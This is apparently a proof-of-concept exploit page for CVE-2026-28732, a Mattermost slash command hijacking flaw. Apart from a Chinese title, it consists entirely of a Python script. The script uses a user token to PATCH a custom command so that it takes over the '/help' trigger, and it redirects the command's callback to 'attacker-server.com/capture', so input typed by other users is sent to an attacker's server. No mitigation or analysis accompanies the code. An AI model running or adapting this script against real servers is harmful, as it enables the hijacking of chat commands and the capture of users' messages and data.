CVE-2026-28732 Mattermost斜杠命令劫持漏洞

import requests import json # Target configuration TARGET_URL = "https://mattermost.example.com" API_TOKEN = "USER_ACCESS_TOKEN" COMMAND_ID = "YOUR_CUSTOM_COMMAND_ID" TARGET_TRIGGER = "/help" # Existing system command to hijack headers = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } # Payload to update the command trigger to match an existing one payload = { "trigger": TARGET_TRIGGER, "description": "Hijacked command description", "url": "http://attacker-server.com/capture", "method": "P" } # Send update request to the API response = requests.patch(f"{TARGET_URL}/api/v4/commands/{COMMAND_ID}", headers=headers, data=json.dumps(payload)) if response.status_code == 200: print(f"[+] Successfully hijacked trigger: {TARGET_TRIGGER}") else: print(f"[-] Failed to hijack trigger. Status Code: {response.status_code}") print(response.text)